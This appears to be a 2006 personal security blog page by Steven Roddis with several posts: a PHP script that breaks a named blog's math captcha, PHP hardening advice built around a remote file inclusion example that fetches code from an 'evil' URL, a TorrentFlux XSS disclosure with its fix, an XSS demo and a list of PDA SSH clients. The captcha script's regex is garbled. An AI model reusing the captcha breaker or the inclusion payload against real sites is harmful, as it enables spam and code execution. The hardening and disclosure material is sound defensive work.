Today, I still don’t remember how I got to this blog post but anyway I saw that they had a text based captcha.

The blog author claims that it prevents spam, which it does! Because it added an extra layer of uniqueness to his code and unintelligent spam bots don’t realise. Anyway now for the breaking:

//Break Text Based Captcha:
$regex = ‘#/>\s+

\s+
$page = getpage(’http://pooteeweet.org/blog/259/p/1′);

preg_match($regex, $page, $matches);
$n1 = intval($matches[1]);
$n2 = intval($matches[3]);

$op = $matches[2];

switch ($op) {
case ‘+’:
$INTresult = intval($n1+$n2);
break;

case ‘-’:
$INTresult = intval($n1-$n2);
break;

case ‘/’:
$INTresult = intval($n1/$n2);
break;

case ‘*’:
$INTresult = intval($n1*$n2);
break;

default:
die(’Illegal Operation’);
break;
}

echo $INTresult;
?>

Note that my framework has a function getpage which is just a simple (well quite advanced actually…) curl function.

There you have it $INTresult is the answer to the math problem.

Yes this is a very simple text captcha but breaking a more advanced one wouldn’t require that much more effort.

Regards,

Steven Roddis

I get a lot of questions regarding how to increase security in their PHP App.

Aside from the obvious, write secure code; there are two easy “switches that you can flick”.

Disable: URL fopen wrappers

This will prevent most exploitations of the classic File Inclusion Vulnerability.

eg. include($foo.’bar.php’);

Now if $foo is set to ‘http://www.stevenroddis.com/evil?’

The script grabs PHP code from “http://www.stevenroddis.com/evil?bar.php”

But if URL fopen wrappers if off, then the hacker can only use files on your server. (Still with limitations such as the appending string)

However there is a downside to this some applications may use url wrappers to download data off the web, you can work around it by using curl, but you might not want to.

How?

php.ini (most people won’t have access to this)

allow_url_fopen off

.htaccess

php_flag allow_url_fopen off

Turn Off: Register Globals

Yes, it is off by default but the number of sites that get hacked due to it being on is astounding. Register Globals is not needed in 99.99% of PHP apps.

How?

php.ini (most people won’t have access to this)

register_globals off

.htaccess

php_flag register_globals off

#3 Bonus: Turn off Error Reporting

A lot of sites show sensitive information can make it easier to find a security hold and/or exploit it.

How?

php.ini (most people won’t have access to this)

display_errors Off

.htaccess

php_flag display_errors Off

Enforce these in your web app:

Don’t let stupid configuration changes bring down your defences, inside your php application make sure you die() and give some [nice] error, when say register globals is turned back on.

Code:

if (@ini_get(’register_globals’))
{
die();
}

You might want to do it also for allow_url_fopen (replace “register_globals” in the above with “allow_url_fopen”).

There you have it two (well four) easy and simple steps to greatly increase security in your PHP application. (Three of them don’t require changing your code)

Regards,

Steven Roddis

Name: TorrentFlux User-Agent XSS Vulnerability
Published: 2006-10-06
Critical Level: Moderate
Type: Cross-Site Scripting
Where: Remote
Status: 0-Day
Software: Torrentflux 2.1
Discoverer: Steven Roddis (http://www.stevenroddis.com)

I gave the authors of this product a week (more than usual) just to contact me, they have failed to do so; so I am releasing this vulnerability publicly!

/admin.php

Line: 325

$ip_info = $ip_resolved.”
“.$user_agent;

Useragent is not esacped.

Solution:

Edit source code:

/admin.php

Line: 325:

$ip_info = htmlentities($ip_resolved, ENT_QUOTES).”
“.htmlentities($user_agent, ENT_QUOTES);

After not being bothered to update my weblog, I have decided to update it…

I have moved everything to a different server and enabled caching, which will mean a lot faster page loading!

So what is in store??

Hacks, cracks, and exploits; (Well Hacks and Exploits) Only the legal stuff such as laser audio transmitters and the liking (old school hacking). And exploits, however I have a policy of notifying the producers of the flawed product, if they don’t respond or don’t fix it in enough time. (eg. File inclusion = ~ 3 days). Then the exploit gets released publicly. If the author of the product genuinely needs more time, then upon assessment they may be given it. So you will only see it after the conditions above are met.

Regards,
Steven Roddis

N.B. This is to fix the Client Side stuff, NOT server side things.

Problem:

Consider this:

<script type=”text/javascript”>

<!–

var text = ‘<script>alert(\’Boo!\’);</script>’;

document.write(text);

–>

See the problem that any input however it is obtained (Eg. Form) isn’t converted into text, but left as html.

Yes, I know that this doesn’t pose a great security risk as the client has to type it in, however that is no excuse! Read the rest of this entry »

How many times have I been around a WiFi spot and wanted to remotly administer a computer but only had my PDA with me?

Well to many times, so I searched around for some free pocket SSH Clients and I also included a VNC Viewer for PDA’s too.

PocketPutty (http://pocketputty.duxy.net)

This SSH Client doesn’t require installation on your pocket pc and can be run straight away. It supports SSH1/SSH2 and Telnet. It also has a compression option that helps conserve bandwidth.

OpenSSH CE (http://www.eskimo.com/~webguy/service/openssh.html)

OpenSSH CD Doesn’t not require instalation aswell, but does require the user to configure it. (Putty doesn’t) OpenSSH CE does support secure file transfer whereas Putty doesn’t.

Putty = Fast Setup
OpenSSH CE = More Things

VNC Viewer for Pocket PC (http://www.cs.utah.edu/~midgley/wince/vnc.html)